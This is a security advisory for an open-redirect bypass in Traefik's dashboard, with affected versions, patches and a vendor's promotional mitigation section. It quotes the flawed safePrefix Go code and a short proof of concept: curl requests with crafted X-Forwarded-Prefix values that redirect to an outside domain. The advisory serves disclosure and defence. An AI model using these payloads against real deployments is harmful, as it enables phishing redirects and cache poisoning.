GHSA-h924-8g65-j9wg
Traefik's X-Forwarded-Prefix Header still allows for Open Redirect
EPSS Exploitation Probability
EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.
Blast Radius
github.com/traefik/traefik/v2🐹github.com/traefik/traefik/v3Real-time download stats are indexed for npm and PyPI packages. This vulnerability affects Go packages — download data is not available via public APIs for these ecosystems.
Description
Impact
There is a vulnerability in Traefik that allows the client to provide the X-Forwarded-Prefix header from an untrusted source.
Patches
- https://github.com/traefik/traefik/releases/tag/v2.11.14
- https://github.com/traefik/traefik/releases/tag/v3.2.1
Workarounds
No workaround.
For more information
If you have any questions or comments about this advisory, please open an issue.
<details> <summary>Original Description</summary> ### Summary The previously reported open redirect ([GHSA-6qq8-5wq3-86rp](https://github.com/traefik/traefik/security/advisories/GHSA-6qq8-5wq3-86rp)) is not fixed correctly. The safePrefix function can be tricked to return an absolute URL.Details
The Traefik API dashboard component tries to validate that the value of the header X-Forwarded-Prefix is a site relative path:
http.Redirect(resp, req, safePrefix(req)+"/dashboard/", http.StatusFound)
func safePrefix(req *http.Request) string {
prefix := req.Header.Get("X-Forwarded-Prefix")
if prefix == "" {
return ""
}
parse, err := url.Parse(prefix)
if err != nil {
return ""
}
return parse.Path
}
PoC
An attacker can bypass this by sending the following payload:
curl -v 'http://traefik.localhost' -H 'X-Forwarded-Prefix: %0d//a.com'
[...]
> HTTP/1.1 302 Found
> Location: //a.com/dashboard/
or similar:
curl -v 'http://traefik.localhost' -H 'X-Forwarded-Prefix: %2f%2fa.com'
[...]
> HTTP/1.1 302 Found
> Location: //a.com/dashboard/
Impact
Similar to the previously reported bug. In cache poisoning scenarios this may be exploitable.
</details>Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 🐹Go | github.com/traefik/traefik/v2 | all versions | 2.11.14 |
| 🐹Go | github.com/traefik/traefik/v3 | all versions | 3.2.1 |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for github.com/traefik/traefik/v2. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update github.com/traefik/traefik/v2 to 2.11.14 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-h924-8g65-j9wg is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-h924-8g65-j9wg is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to GHSA-h924-8g65-j9wg. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-h924-8g65-j9wg in your dependencies?
O3 detects GHSA-h924-8g65-j9wg across Go dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.